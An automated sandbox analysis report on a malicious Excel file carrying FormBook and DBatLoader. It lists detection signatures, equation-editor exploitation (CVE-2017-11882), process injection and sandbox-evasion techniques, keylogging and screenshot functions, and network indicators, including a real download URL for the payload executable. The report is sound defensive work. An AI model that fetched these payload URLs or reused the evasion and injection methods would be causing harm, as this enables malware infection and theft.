Windows Analysis Report 4514808437.xlsx

Overview

General Information

Sample Name: 4514808437.xlsx
Analysis ID: 532860
MD5: 0b1244570453cc560192b00e942239e9
SHA1: 6ce2f17a9ffb5640d69d07c71a5f2711482567fd
SHA256: 53ea97de19540a414997e31c383830b6ff1a5fb7120c1bf7ccf493280bc22b3d
Tags: Formbook, VelvetSweatshop, xlsx

Detection

DBatLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Yara detected DBatLoader
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Allocates memory in foreign processes
Injects a PE file into a foreign process
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Contains functionality to inject code into remote processes
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Uses ipconfig to lookup or modify the Windows network settings
Sample uses process hollowing technique
Writes to foreign memory regions
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops PE files to the user root directory
Contains functionality to inject threads in other processes
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Drops PE files to the user directory
May check if the current machine is a sandbox (GetTickCount - Sleep)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Uses Windows Living Off The Land Binaries (LOLBins)
Yara signature match
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality to record screenshots
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Office Equation Editor has been started
Contains functionality to detect sandboxes (mouse cursor move detection)
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://198.46.136.201/1100/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: 4514808437.xlsx ReversingLabs: Detection: 31%
Yara detected FormBook
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 35%
Source: C:\Users\user\Esfjmbxd.exe ReversingLabs: Detection: 35%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 35%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\Esfjmbxd.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 8.3.Esfjmbxd.exe.1d2d594.279.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d9db70.110.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d85e2c.142.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d248e4.73.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e93000.141.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d34008.147.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da2764.16.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d91894.8.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d91b2c.124.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 18.0.logagent.exe.72480000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.3.vbc.exe.1e990f4.168.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2ce70.236.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2932c.197.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e91b2c.122.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8459c.32.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8cf84.240.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.vbc.exe.72480000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.Esfjmbxd.exe.1d8ce70.236.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d1ac.247.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41ca4.266.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d90ad4.83.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8ce70.235.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d4058c.218.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1520.45.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41774.250.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e94008.77.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da2764.18.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d1e84c.30.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2c3b0.211.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e9d0a8.94.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d25eec.146.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da154c.244.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d89308.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e90008.69.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da1324.242.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8932c.199.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d29f80.27.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2c3b0.213.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d85eec.144.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d90ad4.81.unpack Avira: Label: TR/Patched.Ren.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: logagent.exe, logagent.exe, 00000006.00000002.615134919.0000000002060000.00000040.00000001.sdmp, logagent.exe, 00000006.00000003.526241583.0000000001ED0000.00000004.00000001.sdmp, logagent.exe, 00000006.00000002.617474362.00000000021E0000.00000040.00000001.sdmp, logagent.exe, 00000006.00000003.525081229.00000000006B0000.00000004.00000001.sdmp
Source: Binary string: cmstp.pdb source: logagent.exe, 00000006.00000002.613866471.0000000000844000.00000004.00000020.sdmp, logagent.exe, 00000006.00000002.613071462.00000000001C0000.00000040.00020000.sdmp
Source: C:\Users\Public\vbc.exe Code function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_004057AC
Source: C:\Users\Public\vbc.exe Code function: 4_2_042F7DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 4_2_042F7DE0
Source: C:\Users\Public\vbc.exe Code function: 4_2_042F56C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_042F56C4
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 8_2_004057AC
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_03A27DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 8_2_03A27DE0
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_03A256C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 8_2_03A256C4
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 11_2_004057AC
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_03C17DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 11_2_03C17DE0
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_03C156C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 11_2_03C156C4

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.46.136.201:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: onedrive.live.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\logagent.exe Code function: 4x nop then pop edi 6_2_7248C3F1
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.46.136.201:80

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Dec 2021 17:59:04 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.26Last-Modified: Thu, 02 Dec 2021 04:16:21 GMTETag: "aa600-5d2220d845288"Accept-Ranges: bytesContent-Length: 697856Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /1100/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.136.201Connection: Keep-Alive
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EXCEL.EXE, 00000000.00000002.685373702.0000000004FD7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.685373702.0000000004FD7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: EXCEL.EXE, 00000000.00000003.462635488.0000000005682000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.686338748.00000000056A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488474332.000000000569D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458387765.000000000567F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.475950453.000000000569D000.00000004.00000001.sdmp String found in binary or memory: http://purl.or
Source: vbc.exe, 00000004.00000002.526299190.00000000043A0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.545744651.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: EXCEL.EXE, 00000000.00000002.685373702.0000000004FD7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.685373702.0000000004FD7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.526299190.00000000043A0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.587231139.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EXCEL.EXE, 00000000.00000002.685373702.0000000004FD7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: https://kq7x1q.am.files.1drv.com/
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: https://kq7x1q.am.files.1drv.com/y4mwiQWh6cfss-mW5wezTm5o7oGjOP62NBGfPYedvCz2WKwFZgTNzbddi7h4QH2It-m
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: https://kq7x1q.am.files.1drv.com/y4mwsG06syifTHAS5HkN28pWDk3GlzC5z84oxMa9e3TcbYAr9A_gIaA9INSaV2yKob0
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: https://kq7x1q.am.files.1drv.com/y4mxhWp3h-UsRCUD9vA7Dev8BiVWxcpKH13bzTDe7jB8OzNuMsD0PxjLns2tLasVuJa
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: https://onedrive.live.com/
Source: vbc.exe, 00000004.00000002.525876843.00000000033E0000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=B2E8AC4B094502D7&resid=B2E8AC4B094502D7%21113&authkey=APgSc0s
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91A998F7.emf
Source: unknown DNS traffic detected: queries for: onedrive.live.com
Source: C:\Users\Public\vbc.exe Code function: 4_2_003E3A78 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 4_2_003E3A78
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\Public\vbc.exe Code function: 4_2_00433B64 GetKeyboardState, 4_2_00433B64
Contains functionality to record screenshots
Source: C:\Users\Public\vbc.exe Code function: 4_2_00425A40 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 4_2_00425A40

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
